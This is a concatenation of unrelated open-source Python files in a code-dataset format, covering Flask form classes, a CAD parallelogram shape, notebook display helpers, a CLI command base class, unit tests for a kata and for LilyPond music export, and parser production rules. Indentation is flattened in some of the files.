def __init__(self, user, *args, **kwargs):
super(EditProfileAdminForm, self).__init__(*args, **kwargs)
self.role.choices = [(role.id, role.name)
for role in Role.query.order_by(Role.name).all()]
self.user = user
def validate_email(self, field):
if field.data != self.user.email and \
User.query.filter_by(email=field.data).first():
            raise ValidationError(u'This email is already registered; please log in instead.')
def validate_username(self, field):
if field.data != self.user.username and \
User.query.filter_by(username=field.data).first():
            raise ValidationError(u'This username is already taken; please choose another.')
class CommentForm(Form):
    body = TextAreaField(u'Comment', validators=[DataRequired(u'Content cannot be empty!')], render_kw={'rows': 5})
    submit = SubmitField(u'Submit')
class NewAlbumForm(Form):
    title = StringField(u'Title')
    about = TextAreaField(u'Description', render_kw={'rows': 8})
    photo = FileField(u'Image', validators=[
        FileRequired(u'You have not selected an image!'),
        FileAllowed(photos, u'Only images can be uploaded!')
    ])
    asc_order = SelectField(u'Display order',
                            choices=[('True', u'Sort by upload time, ascending'), ('False', u'Sort by upload time, descending')])
    no_public = BooleanField(u'Private album (when checked, the album is visible only to you)')
    no_comment = BooleanField(u'Disable comments')
    submit = SubmitField(u'Submit')
class AddPhotoForm(Form):
    photo = FileField(u'Image', validators=[
        FileRequired(),
        FileAllowed(photos, u'Only images can be uploaded!')
    ])
    submit = SubmitField(u'Submit')
class EditAlbumForm(Form):
    title = StringField(u'Title')
    about = TextAreaField(u'Description', render_kw={'rows': 8})
    asc_order = SelectField(u'Display order',
                            choices=[("1", u'Sort by upload time, ascending'), ("0", u'Sort by upload time, descending')])
    no_public = BooleanField(u'Private album (info tip slides out on the right: when checked, the album is visible only to you)')
    no_comment = BooleanField(u'Allow comments')
    submit = SubmitField(u'Submit')
| 2.375 | 2 |
mach_cad/model_obj/cross_sects/parallelogram/__init__.py | Severson-Group/MachEval | 6 | 12759603 | import numpy as np
from ...dimensions.dim_linear import DimLinear
from ...dimensions.dim_angular import DimAngular
from ...dimensions import DimRadian
from ..cross_sect_base import CrossSectBase, CrossSectToken
__all__ = ['CrossSectParallelogram']
class CrossSectParallelogram(CrossSectBase):
def __init__(self, **kwargs: any) -> None:
'''
        Initialization function for the Parallelogram class. This function takes in
        arguments and saves the information passed to private variables to make
        them read-only.
Parameters
----------
**kwargs : any
DESCRIPTION. Keyword arguments provided to the initialization function.
The following argument names have to be included in order for the code
to execute: name, dim_l, dim_t, dim_theta, location.
Returns
-------
None
'''
self._create_attr(kwargs)
super()._validate_attr()
self._validate_attr()
@property
def dim_l(self):
return self._dim_l
@property
def dim_t(self):
return self._dim_t
@property
def dim_theta(self):
return self._dim_theta
def draw(self, drawer):
l = self.dim_l # height of the parallelogram
t = self.dim_t # width of the parallelogram
theta = DimRadian(self.dim_theta) # angle of the parallelogram
x = [0, l * np.cos(theta), l * np.cos(theta) + t / np.sin(theta), t / np.sin(theta)]
        y = [0, l * np.sin(theta), l * np.sin(theta), 0]
z = np.array([x, y])
coords = np.transpose(z)
points = self.location.transform_coords(coords)
# draw parallelogram
side_1 = drawer.draw_line(points[0], points[1])
side_2 = drawer.draw_line(points[1], points[2])
side_3 = drawer.draw_line(points[2], points[3])
side_4 = drawer.draw_line(points[3], points[0])
x_coord = (l * np.cos(theta) + t / np.sin(theta)) / 2
y_coord = l * np.sin(theta) / 2
ic = np.array([[x_coord, y_coord]])
inner_coord = self.location.transform_coords(ic)
segments = [side_1, side_2, side_3, side_4]
cs_token = CrossSectToken(inner_coord[0], segments)
return cs_token
def _validate_attr(self):
if not isinstance(self._dim_l, DimLinear):
raise TypeError('dim_l is not of DimLinear')
if not isinstance(self._dim_t, DimLinear):
raise TypeError('dim_t is not of DimLinear')
if not isinstance(self._dim_theta, DimAngular):
raise TypeError('dim_theta is not of DimAngular')
| 2.703125 | 3 |
helpers/presentation.py | krassowski/meningitis-integration | 0 | 12759604 | <filename>helpers/presentation.py
from IPython.core.display import HTML
def show_list(data, mode='bullet'):
assert mode in {'bullet', 'numeric'}
output = ''
if mode == 'bullet':
container = 'ul'
else:
container = 'ol'
output += f'<{container}>'
for element in data:
output += '<li>' + str(element)
output += f'</{container}>'
return HTML(output)
def compare_sets(a, b, percentage=None):
a = set(a)
b = set(b)
additional_in_a = a - b
additional_in_b = b - a
out = []
for i, difference in enumerate([additional_in_a, additional_in_b]):
if difference:
if len(difference) < 10:
difference_text = difference
else:
dl = sorted(difference)
total_diff = len(difference)
if percentage:
total = len(a.union(b))
total_diff = f'{total_diff} ({total_diff / total * 100:.2f}%)'
difference_text = (
'{'
+ ', '.join(dl[:3])
+ ', ..., '
+ ', '.join(dl[-3:])
+ '}' + f', {total_diff} in total'
)
out += [f'The {"first" if i == 0 else "second"} set has additional elements: {difference_text}']
if a == b:
assert not additional_in_a and not additional_in_b
out = ['The sets are equal']
return HTML('<br>'.join(out))
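if __name__ == '__main__':
    # Hedged usage sketch (not part of the original helpers): outside a
    # notebook, the raw HTML fragment is available via the .data attribute.
    print(compare_sets({'a', 'b'}, {'b', 'c'}).data)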
| 2.9375 | 3 |
wxgigo/management/base.py | rfancn/wxgigo | 0 | 12759605 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2016 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
OR OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import unicode_literals
import sys
import os
import wxgigo
from wxgigo.management.cmdparser import CommandParser, CommandError, SystemCheckError
#from wxgigo.utils.version import get_version
class BaseCommand(object):
"""
Base Command
"""
_called_from_command_line = False
# Metadata about this command.
option_list = ()
help = ''
args = ''
def __init__(self):
pass
def get_version(self):
"""
Return the wxgigo version, which should be correct for all
built-in Django commands. User-supplied commands should
override this method.
"""
return wxgigo.get_version()
@property
def use_argparse(self):
return not bool(self.option_list)
def usage(self, subcommand):
"""
Return a brief description of how to use this command, by
default from the attribute ``self.help``.
"""
        return self.help
def create_parser(self, prog_name, subcommand):
"""
Create and return the ``ArgumentParser`` which will be used to
parse the arguments to this command.
"""
parser = CommandParser(self, prog="%s %s" % (os.path.basename(prog_name), subcommand),
description=self.help or None)
parser.add_argument('--version', action='version', version=self.get_version())
if self.args:
# Keep compatibility and always accept positional arguments, like optparse when args is set
parser.add_argument('args', nargs='*')
self.add_arguments(parser)
return parser
def add_arguments(self, parser):
"""
Entry point for subclassed commands to add custom arguments.
"""
pass
def print_help(self, prog_name, subcommand):
"""
Print the help message for this command, derived from
``self.usage()``.
"""
parser = self.create_parser(prog_name, subcommand)
parser.print_help()
def run_from_argv(self, argv):
"""
Set up any environment changes requested (e.g., Python path
and Django settings), then run this command. If the
command raises a ``CommandError``, intercept it and print it sensibly
to stderr. If the ``--traceback`` option is present or the raised
``Exception`` is not ``CommandError``, raise it.
"""
self._called_from_command_line = True
parser = self.create_parser(argv[0], argv[1])
options = parser.parse_args(argv[2:])
cmd_options = vars(options)
# Move positional args out of options to mimic legacy optparse
args = cmd_options.pop('args', ())
try:
self.handle(*args, **cmd_options)
except Exception as e:
if not isinstance(e, CommandError):
raise
self.stderr.write('%s: %s' % (e.__class__.__name__, e))
sys.exit(1)
def handle(self, *args, **options):
"""
The actual logic of the command. Subclasses must implement this method.
"""
raise NotImplementedError('subclasses of BaseCommand must provide a handle() method')
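if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module): a minimal
    # subclass showing the handle() contract; invoking run_from_argv assumes
    # the package's CommandParser accepts argparse-style arguments.
    class HelloCommand(BaseCommand):
        help = 'Print a greeting'
        def handle(self, *args, **options):
            print('hello from wxgigo')
    HelloCommand().run_from_argv(['manage.py', 'hello'])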
| 1.945313 | 2 |
tests/kyu_8_tests/test_my_head_is_at_the_wrong_end.py | the-zebulan/CodeWars | 40 | 12759606 | <gh_stars>10-100
import unittest
from katas.kyu_8.my_head_is_at_the_wrong_end import fix_the_meerkat
class FixTheMeerkatTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(
fix_the_meerkat(['tail', 'body', 'head']),
['head', 'body', 'tail']
)
def test_equals_2(self):
self.assertEqual(
fix_the_meerkat(['tails', 'body', 'heads']),
['heads', 'body', 'tails']
)
def test_equals_3(self):
self.assertEqual(
fix_the_meerkat(['bottom', 'middle', 'top']),
['top', 'middle', 'bottom']
)
def test_equals_4(self):
self.assertEqual(
fix_the_meerkat(['lower legs', 'torso', 'upper legs']),
['upper legs', 'torso', 'lower legs']
)
def test_equals_5(self):
self.assertEqual(
fix_the_meerkat(['ground', 'rainbow', 'sky']),
['sky', 'rainbow', 'ground']
)
| 3.078125 | 3 |
MuseParse/tests/testLilyMethods/testMeasure.py | Godley/MusIc-Parser | 5 | 12759607 | import unittest
from MuseParse.classes.ObjectHierarchy.ItemClasses import Directions, BarlinesAndMarkers, Meter, Note
from MuseParse.tests.testLilyMethods.lily import Lily
from MuseParse.classes.ObjectHierarchy.TreeClasses.NoteNode import NoteNode
from MuseParse.classes.ObjectHierarchy.TreeClasses.MeasureNode import MeasureNode
from MuseParse.classes.ObjectHierarchy.TreeClasses.StaffNode import StaffNode
class MeasureTests(Lily):
def testValue(self):
if hasattr(self, "lilystring"):
if hasattr(self, "item"):
self.assertEqual(self.lilystring, self.item.toLily())
class testMeasure(MeasureTests):
def setUp(self):
self.item = MeasureNode()
self.lilystring = " | "
class testMeasureNote(MeasureTests):
def setUp(self):
self.item = MeasureNode()
note = Note.Note()
note.pitch = Note.Pitch()
self.item.addNote(note)
self.lilystring = "c' | "
self.compile = True
self.wrappers = ["\\new Staff {", "}"]
Lily.setUp(self)
self.name = "measurenote"
class testMeasureChord(MeasureTests):
def setUp(self):
self.item = MeasureNode()
note = Note.Note()
note.pitch = Note.Pitch()
self.item.addNote(note)
note2 = Note.Note(chord=True)
note2.pitch = Note.Pitch()
self.item.addNote(note2, chord=True)
self.lilystring = "<c' c'> | "
self.compile = True
self.wrappers = ["\\new Staff {", "}"]
Lily.setUp(self)
self.name = "measurenotechord"
class testMeasureNoteWithGrace(MeasureTests):
def setUp(self):
self.item = MeasureNode()
note = Note.Note(type="quarter")
note.pitch = Note.Pitch()
grace = Note.GraceNote(first=True)
grace.last = True
note.addNotation(grace)
self.item.addNote(note)
self.item.RunVoiceChecks()
self.lilystring = "\grace { c'4 } | "
self.compile = True
self.wrappers = ["\\new Staff {", "}"]
Lily.setUp(self)
self.name = "measurenotegrace"
class testMeasureTempo(MeasureTests):
def setUp(self):
self.item = MeasureNode()
self.item.addDirection(Directions.Metronome(beat="quarter", min=60))
self.item.addNote(NoteNode())
self.lilystring = " \\tempo 4=60 | "
self.compile = True
self.wrappers = ["\\new Staff {", "}"]
Lily.setUp(self)
self.name = "measuretempo"
class testMeasureTwoDirections(MeasureTests):
def setUp(self):
self.item = MeasureNode()
self.item.addDirection(
Directions.Direction(
text="hello world",
placement="above"))
self.item.addDirection(Directions.Metronome(beat="quarter", min=60))
self.item.addNote(NoteNode())
self.lilystring = " ^\\markup { \"hello world\" } \\tempo 4=60 | "
self.compile = True
self.wrappers = ["\\new Staff {", "}"]
Lily.setUp(self)
self.name = "measuretwodirections"
class testMeasureTwoNotes(MeasureTests):
def setUp(self):
self.item = MeasureNode()
note = Note.Note()
note.pitch = Note.Pitch()
self.item.addNote(note)
note2 = Note.Note()
note2.pitch = Note.Pitch()
self.item.addNote(note2)
self.lilystring = "c' c' | "
self.compile = True
self.wrappers = ["\\new Staff {", "}"]
Lily.setUp(self)
self.name = "measuretwonotes"
class testMeasureOneNoteOneDirection(MeasureTests):
def setUp(self):
self.item = MeasureNode()
note = Note.Note()
note.pitch = Note.Pitch()
self.item.addDirection(
Directions.Direction(
text="hello",
placement="below"))
self.item.addNote(note)
self.lilystring = "c' _\\markup { \"hello\" } | "
self.compile = True
self.wrappers = ["\\new Staff {", "}"]
Lily.setUp(self)
self.name = "measurenotedirection"
class testPartialMeasure(MeasureTests):
def setUp(self):
self.item = MeasureNode()
self.item.partial = True
self.item.meter = Meter.Meter(beats=4, type=4)
note = Note.Note(type="quarter")
note.pitch = Note.Pitch()
self.item.addNote(note)
self.lilystring = "\\time 4/4 \partial 4 c'4 | "
self.compile = True
self.wrappers = ["\\new Staff {", "}"]
Lily.setUp(self)
self.name = "measurePartial"
class testPartialMeasureTwoNotes(Lily):
def setUp(self):
self.item = MeasureNode(partial=True)
self.item.meter = Meter.Meter(type=4, beats=4)
note = Note.Note()
note.SetType("quarter")
note.pitch = Note.Pitch(octave=4)
note2 = Note.Note()
note2.SetType("quarter")
note2.pitch = Note.Pitch(octave=4)
self.item.addNote(note)
self.item.addNote(note2)
Lily.setUp(self)
self.lilystring = "\\time 4/4 \partial 2 c'4 c'4 | "
class testPartialMeasureTwoNotesDifferentTypes(Lily):
def setUp(self):
self.item = MeasureNode(partial=True)
self.item.meter = Meter.Meter(type=4, beats=4)
note = Note.Note()
note.SetType("quarter")
note.pitch = Note.Pitch(octave=4)
note2 = Note.Note()
note2.SetType("half")
note2.pitch = Note.Pitch(octave=4)
self.item.addNote(note)
self.item.addNote(note2)
Lily.setUp(self)
self.lilystring = "\\time 4/4 \partial 2. c'4 c'2 | "
class testPartialMeasureThreeNotesDifferentTypes(Lily):
def setUp(self):
self.item = MeasureNode(partial=True)
self.item.meter = Meter.Meter(type=4, beats=4)
note = Note.Note(type="quarter")
note.pitch = Note.Pitch(octave=4)
note2 = Note.Note(type="half")
note2.pitch = Note.Pitch(octave=4)
note3 = Note.Note(type="eighth")
note3.pitch = Note.Pitch(octave=4)
self.item.addNote(note)
self.item.addNote(note2)
self.item.addNote(note3)
Lily.setUp(self)
self.lilystring = "\\time 4/4 \partial 2.. c'4 c'2 c'8 | "
class testPartialMeasureThreeNotesSameTypes(Lily):
def setUp(self):
self.item = MeasureNode(partial=True)
self.item.meter = Meter.Meter(type=4, beats=4)
note = Note.Note(type="quarter")
note.pitch = Note.Pitch(octave=4)
note2 = Note.Note(type="quarter")
note2.pitch = Note.Pitch(octave=4)
note3 = Note.Note(type="quarter")
note3.pitch = Note.Pitch(octave=4)
self.item.addNote(note)
self.item.addNote(note2)
self.item.addNote(note3)
Lily.setUp(self)
self.lilystring = "\\time 4/4 \partial 2. c'4 c'4 c'4 | "
class testMeasureOrder(Lily):
def setUp(self):
self.item = StaffNode()
measure1 = MeasureNode()
self.item.AddChild(measure1, index=1)
measure2 = MeasureNode()
measure3 = MeasureNode()
self.item.AddChild(measure2, index="X1")
self.item.AddChild(measure3, index=2)
self.lilystring = " % measure 1\n | \n\n % measure X1\n | \n\n % measure 2\n | \n\n"
class testMeasureTranspositionCalc(unittest.TestCase):
def setUp(self):
self.item = MeasureNode()
def testCalcUpWithChromatic(self):
self.item.transpose = BarlinesAndMarkers.Transposition(chromatic=2)
expected = "\\transpose c' d' {"
self.assertEqual(self.item.CalculateTransposition(), expected)
def testCalcUpWithDiatonic(self):
self.item.transpose = BarlinesAndMarkers.Transposition(diatonic=1)
expected = "\\transpose c' d' {"
self.assertEqual(self.item.CalculateTransposition(), expected)
def testCalcOctaveShift(self):
self.item.transpose = BarlinesAndMarkers.Transposition(octave=1)
expected = "\\transpose c' c'' {"
self.assertEqual(self.item.CalculateTransposition(), expected)
class testMeasureNoteWithShifter(Lily):
def setUp(self):
self.item = MeasureNode()
node = NoteNode()
node.GetItem().pitch = Note.Pitch(octave=4)
self.item.addNote(node)
dirnode = Directions.OctaveShift(amount=8, type="up")
self.item.addDirection(dirnode)
node2 = NoteNode()
node2.GetItem().pitch = Note.Pitch(octave=4)
self.item.addNote(node2)
Lily.setUp(self)
self.compile = True
self.wrappers = ["\\new Staff{a8 ", "c'8]}"]
self.lilystring = "c' \n\\ottava #-1\n c' | "
self.name = "noteOctaveShift"
class testShiftBeforeNote(unittest.TestCase):
def setUp(self):
self.item = MeasureNode()
dirnode = Directions.OctaveShift(amount=8, type="up")
self.item.addDirection(dirnode)
self.node = NoteNode()
self.node.GetItem().pitch = Note.Pitch(octave=2)
self.item.addNote(self.node)
def testLilystring(self):
value = "\n\\ottava #-1\n c, | "
self.assertEqual(value, self.item.toLily())
class testGraceAtStartOfMeasure(unittest.TestCase):
def setUp(self):
self.item = MeasureNode()
node = NoteNode()
self.note = Note.Note(type="quarter")
self.note.addNotation(Note.GraceNote())
self.note.pitch = Note.Pitch()
node.SetItem(self.note)
self.item.addNote(node)
self.item.RunVoiceChecks()
def testIsFirstGraceNote(self):
result = self.note.Search(Note.GraceNote)
self.assertTrue(result.first)
def testLilystring(self):
value = "\grace { c'4 } | "
self.assertEqual(value, self.item.toLily())
class testTwoVoicesMeasureNotePosition(Lily):
def setUp(self):
self.item = MeasureNode()
node = Note.Note(type="quarter")
node.pitch = Note.Pitch(octave=4)
self.item.addNote(node, voice=1)
self.item.addNote(node, voice=1)
self.item.Backup(1)
node2 = Note.Note(type="quarter")
node2.pitch = Note.Pitch(octave=4)
self.item.addNote(node2, voice=2)
Lily.setUp(self)
self.compile = True
self.wrappers = ["\\new Staff{a8 ", "c'8]}"]
self.lilystring = "<< % voice 1\n\\new Voice = \"one\"\n{\\voiceOne c'4 c'4 } % voice 2\n\\new Voice = \"two\"\n{\\voiceTwo r4 c'4 }>> | "
self.name = "noteOctaveShift"
def tearDown(self):
self.item = None
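# Convenience entry point (a sketch): lets this module be run directly,
# provided MuseParse and its test fixtures are importable.
if __name__ == '__main__':
    unittest.main()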
| 2.9375 | 3 |
2parser/production_rules.py | formalabstracts/CNL-CIC | 14 | 12759608 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 22 17:00:38 2020
@author: <NAME>
production rules for Colada
Output of parsers will generally be an Etok.
Parser rules ending in _ produce a list of Etoks rather than one.
Inner functions f(acc) are treatments.
Inner functions f(item)->item are item transformers.
The parsers are generally implemented as function calls
rather than values. This gives uniform style and helps
to prevent infinite recursive expansion of parsers.
DEBUG. Not implemented: namespace, record, this_exists,
DEBUG. Currently inconsistent about when a LexToken is converted to an Etok,
and the conversion effort is duplicated:
it is performed both by the Etok constructor and by Etok.rawupdate.
We may need it earlier when we apply v.update(), which raises an error on a LexToken.
"""
#import copy
#import msg
#import traceback
from exception import (ParseError, ParseNoCatch, ErrorItem)
import lib, word_lists
import tokenlib
import lexer
from tokenlib import Etok
#from ply.lex import LexToken #import ply.lex.LexToken as LexToken
import parser_combinator as c
from parser_combinator import (Parse,
next_word, next_any_word, next_value,
first_word,
first_phrase,
next_phrase,
pstream)
import sample
def first(*args):
return Parse.first(args)
def memo(f):
m = {}
def wrapper():
if f not in m:
m[f]= f()
return m[f]
    return wrapper # use the undecorated f to run tests.
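# Illustrative use of @memo (a sketch; the rule name is invented):
# decorating a zero-argument parser factory caches the constructed Parse
# object, so repeated calls reuse one instance instead of rebuilding it:
#
# @memo
# def hello_rule():
#     return next_word('hello')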
#def strip_delim_deprecated(acc):
# """treatment to remove outer delimiters
# Deprecated, because we assume inner material is an Etok.
# """
# (_,b,_) = acc
# return Etok.rawupdate(b,acc)
lookup_parse = {} # dictionary of parses, used for forward refs
def add_lookup_parse(nonterminal,value):
"""Add a new production rule to the lookup_parse dictionary.
The key is the nonterminal string.
The value is the parser associated with it.
    The parser is renamed so that its nonterminal matches the key.
"""
v = value.name(nonterminal)
if nonterminal in lookup_parse:
lookup_parse[nonterminal].append(v)
else:
lookup_parse[nonterminal]= [v]
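# Typical use (a sketch; 'term' is illustrative): a production defined
# late in the file is registered under its nonterminal so that earlier
# get_lookup_parse('term') forward references resolve to it:
#
# add_lookup_parse('term', term())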
#get_lookup_parse_history = {} #for debugging.
#get_lookup_parse_history is here to keep track of
# parsers that have been called but not implemented.
# Keys are all none. It functions as a set.
def get_lookup_parse(nonterminal):
"""The grammar is highly mutually recursive.
To make the implementation simpler, some of the recursion
has been relegated to a dictionary of parses: lookup_parse,
with keys given as nonterminal strings.
The parsers should return an Etok.
As new production rules are implemented, they are
added to the dictionary. The key is the nonterminal.
This function looks up the production rules
for a given key and forms them
into a parser according to the first successful rule.
There is a last resort production rule of letting each nonterminal
string represent a parser that parses the nonterminal as a literal
word string. This last resort rule might give strange behavior but it
is probably quite harmless. The last resort helps with debugging.
# DEBUG. Should not this fail, requiring a string in caps?
>>> pstream(get_lookup_parse('hello'),'hello and')
Etok(WORD,hello,'hello')
>>> pstream(get_lookup_parse('STATEMENT'),'[STATEMENT x > y]')
Etok(STATEMENT,backdoor2,'[ STATEMENT x > y ]')
"""
def f(acc):
return Etok.etok(acc).update({'name':nonterminal,'rule':'backdoor1'})
def f2(acc):
(_,(_,b),_)=acc
return Etok(name=nonterminal,etoks=b,raw=acc,rule='backdoor2')
backdoor1=Parse.next_token().if_rawvalue(nonterminal.upper()).treat(f,nonterminal)
backdoor2= c.bracket(Parse.next_token().if_rawvalue(nonterminal.upper()) + c.balanced()).treat(f2,nonterminal)
ps = [backdoor1,backdoor2] +lookup_parse.get(nonterminal,[])
return Parse.first(ps).name(nonterminal,production='lookup')
def build_word_net(phrase_list):
"""build a word net (discrimination net) from a list of phrases.
No normalization of words is performed, except case.
End of phrase is marked with {'':{}}. Eventually, we stop at key ''.
>>> build_word_net(['this and','this or','that and','this or that'])
{'this': {'and': {'': {}}, 'or': {'': {}, 'that': {'': {}}}}, 'that': {'and': {'': {}}}}
"""
def to_dict(ls):
if not(ls):
return {}
return {ls[0] : to_dict(ls[1:])}
def one_dict(phrase):
od = to_dict(phrase.lower().split()+[''])
return od
def add_dict(d1,od):
if not(od):
return d1
key = [*od][0] #first key
if key in d1:
# N.B. avoid equality to preserve scoping
d1.__setitem__(key,add_dict(d1[key],od[key]))
else:
d1.setdefault(key,od[key])
return d1
acc = {}
for phrase in phrase_list:
acc = add_dict(acc,one_dict(phrase))
return acc
def next_word_net(wn):
"""construct a parser for a word net.
Take the longest match.
>>> pstream(next_word_net(build_word_net(['aa bb cc','bb cc','aa bb cc dd'])),'aa bb cc dd ee')
[LexToken(WORD,'aa',1,0), LexToken(WORD,'bb',1,3), LexToken(WORD,'cc',1,6), LexToken(WORD,'dd',1,9)]
"""
def f(item):
try:
item1 = next_any_word().process(item)
if not(item1.acc.value in wn):
raise ParseError(ErrorItem(item,'next_word_net'))
except (StopIteration, ParseError) as pe:
if '' in wn:
return tokenlib.update([],item)
raise pe
acc1 = item1.acc
wn1 = wn[acc1.value]
item2 = next_word_net(wn1).process(tokenlib.update(None,item1))
return tokenlib.update([acc1]+item2.acc,item2)
return Parse(f,'next_word_net',sample=sample.word_net(wn))
#print(build_word_net(word_lists.transition))
def phrase_list_transition():
"""parser for transition phrases
>>> pstream(phrase_list_transition(),'therefore')
([LexToken(WORD,'therefore',1,0)], None)
"""
return (next_word_net(build_word_net(word_lists.transition)) + next_word('that').possibly())
def phrase_list_filler():
"""parser for filler words.
Examples:
'We know that'
'We see'
'See that'
"""
return (next_word('we').possibly() + first_word('put write have know see') +
next_word('that').possibly())
# case sensitive words
rawtype = next_any_word().if_rawvalue('Type')
rawsort = next_any_word().if_rawvalue('Sort')
rawprop = next_any_word().if_rawvalue('Prop')
rawtrue = next_any_word().if_rawvalue('True')
rawfalse = next_any_word().if_rawvalue('False')
period = next_value('.')
comma = next_value(',')
semicolon = next_value(';')
# :as means to 'coerce as'
colon_as = next_value(':')+next_word('as').possibly()
colon = next_value(':')
lit_dict = {
'a' : first_word('a an'), #indefinite
'article' : first_word('a an the'),
'assume': first_word('assume suppose'),
'axiom': first_word('axiom conjecture hypothesis equation formula'),
'choose': first_word('take choose pick'),
'contradiction' : first_word('contradiction contrary'),
'declare_mutual_inductive_decl': next_phrase('mutual inductive'),
'declare_mutual_inductive_def': next_phrase('mutual inductive def'),
'def': first_word('def definition'),
'defined_as' : first_phrase(['said to be','defined as','defined to be']),
'denote': first_phrase(['denote','stand for']),
'do': first_word('do does'),
'done': first_word('done quit'),
'equal': next_phrase('equal to'),
'exist': (next_word('there').possibly() + next_word('exist')).treat(lib.snd,'lit_exist'),
'false': first_word('off false no'),
'fix': first_word('fix let'),
'forall': (next_word('forall') | next_phrase('for all')),
'has': first_word('has have had'),
'iff': (first_phrase(['iff','if and only if']) |
(first_phrase(['is','are','be','to be']) + next_word('the').possibly() + next_word('predicate'))),
'is' : first_phrase(['is','are','be','to be']),
'lets': first_phrase(['let us','let','we can','we']),
'param': next_phrase('with parameter'),
'prove': first_word('prove show'),
'qed': first_word('end qed obvious literal'),
'satisfy' : first_phrase(['satisfy','give rise to','determine']),
'say': first_word('say write'),
'then': first_word('then therefore hence'),
'theorem': first_word('proposition theorem lemma corollary'),
'true': first_word('on true yes'),
'we-record': next_phrase('we record'),
'we-say': (next_word('we').possibly() +
first_word('say write') +
next_word('that').possibly()
),
'with': first_word('with of having'),
'with_property': next_phrase('with property'),
'wrong': next_phrase('it is wrong that'),
}
def lit(s):
"""parser generator for 's'-like words or phrases
canned phrases that have small variants
lit[w] gives parser for w-like words or phrases
Output Etok(name='lit', rule=s, value=None)
>>> pstream(lit('qed'),'obvious')
Etok(LIT,qed,'obvious')
"""
def f(acc):
return Etok('LIT',[],[acc],s)
if s =='record':
return (Parse.word('we').possibly() +
first_word('record register') +
Parse.word('identification').possibly() +
Parse.word('that').possibly()).treat(f,'that')
else:
return lit_dict[s].treat(f,s)
def read_keyword(s): #was lit_read
"""parser generator for s-like word.
Must be a single word.
    Output is an Etok with name = s (upper-cased) and rule = the matched word.
>>> pstream(read_keyword('assoc'),'right')
Etok(ASSOC,right,'right')
"""
def f(acc):
return Etok(name=s.upper(),etoks=[],raw=acc,rule=acc.value)
local_lit_dict = {
'sort': (rawtype | rawsort),
'assoc': first_word('left right no'),
'field_key': first_word('coercion notationless notation parameter type call'), #renamed map -> call
'document': first_word('document article section subsection subsubsection subdivision division'),
'end_document': first_word('endsection endsubsection endsubsubsection enddivision endsubdivision')
}
if s == 'doc':
return (local_lit_dict['document'] | local_lit_dict['end_document']).treat(f,'doc')
if s == 'location':
return Parse.first([local_lit_dict['document'],lit_dict['theorem'],lit_dict['axiom']]).treat(f,'location')
return local_lit_dict[s].treat(f,s)
def lit_any():
def f(acc):
return Etok(name='any',etoks=acc,raw=acc)
return (first_phrase(['each and every','some and every']) | first_word('every each all any some no')).treat(f,'any')
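# e.g. (a sketch; the exact Etok repr is not pinned down here):
# pstream(lit_any(),'every') should yield an Etok named 'any', and
# 'each and every' is accepted as a single phrase.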
def cs_brace(cs_parse):
"""control sequence parser including arguments in braces.
Etok cs_parse is used to parse cs and
Etok expr to parse each braced arg.
Output: Etok(name='cs_brace') etoks=(cs_brace,braces).
>>> pstream(cs_brace(next_any_word()),'cs {TERM} {TERM} c')
Etok(cs_brace,word,'cs { TERM } { TERM }')
"""
def f(acc):
(cs,bs)=acc
bs = [b for (_,b,_) in bs]
return Etok(name='cs_brace',etoks=(cs,bs),raw=acc,rule=cs_parse.nonterminal)
return (cs_parse + c.brace(expr()).many()).treat(f,'cs_brace')
# case_sensitive_word -> use next_value(s)
@memo
def atomic():
"""parser for atomic identifiers,
converting words and integers as needed
Atomic identifiers cannot be a single letter (a short var)
wordlike atomic identifiers are modulo case-sing-syn.
but hierarchical identifiers are always case sensitive.
Integers are included for section numbers in labels.
output Etok
>>> pstream(atomic(),'HELLO')
Etok(ATOMIC,HELLO,'HELLO')
>>> pstream(atomic(),'the')
Etok(ATOMIC,the,'the')
"""
def f(acc):
if acc.type == 'WORD':
rule = c.synonymize(acc.value)
else:
rule = acc.value
return Etok(name='ATOMIC',etoks=[],raw=[acc],rule=rule)
return Parse.next_token().if_types(['INTEGER','WORD','ATOMIC_IDENTIFIER']).name('atomic').treat(f,'atomic')
@memo
def label():
return atomic()
# no memo, parameter
def primitive(primitive_nonterminal):
def f(item):
if not(primitive_nonterminal in word_lists.prim_list):
raise(ParseNoCatch(ErrorItem(item,primitive_nonterminal,'undeclared primitive')))
return get_lookup_parse(primitive_nonterminal).process(item)
return Parse(f,primitive_nonterminal,'!')
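# Illustrative only: primitive('prim_adjective') defers to the lookup
# table, while a name absent from word_lists.prim_list fails fast with
# ParseNoCatch instead of silently falling back to the backdoor parsers.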
@memo
def section_label():
"""Section label.
Output Etok.etoks = [section,label?]
>>> pstream(section_label(),'Section 3.')
Etok(section_label,'section 3 .')
"""
def f(acc):
(e,_) = acc
return Etok(name='section_label',etoks=e,raw=acc)
def section_tag():
return (read_keyword('doc'))
return (section_tag() + label().possibly() + period).name('section_label').treat(f,'section_label')
class Instruction:
"""Construct a parser that creates an Etok for a given instruction.
There are misc data types: synonym, string, bool, int.
dictionary keys:
name : 'instruction'
rule : instruction keyword
misc : None, synlist, str, bool, int depending on the type
production : 'instruction'
rawvalue : input tokens,
keyword : string indicating instruction,
value : None, synlist, str, bool, int depending on the type.
"""
def _param_misc(tok):
if not(tok):
return None
if tok.type == 'INTEGER':
return int(tok.value)
if tok.value.lower() in ['yes','true','on']:
return True
if tok.value.lower() in ['no','false','off']:
return False
return tok.value
def _expand_slashdash(vs):
"""expanding synonyms
e.g. word/-ing is short for word/wording
>>> Instruction._expand_slashdash('work /- ing effort / workaround'.split())
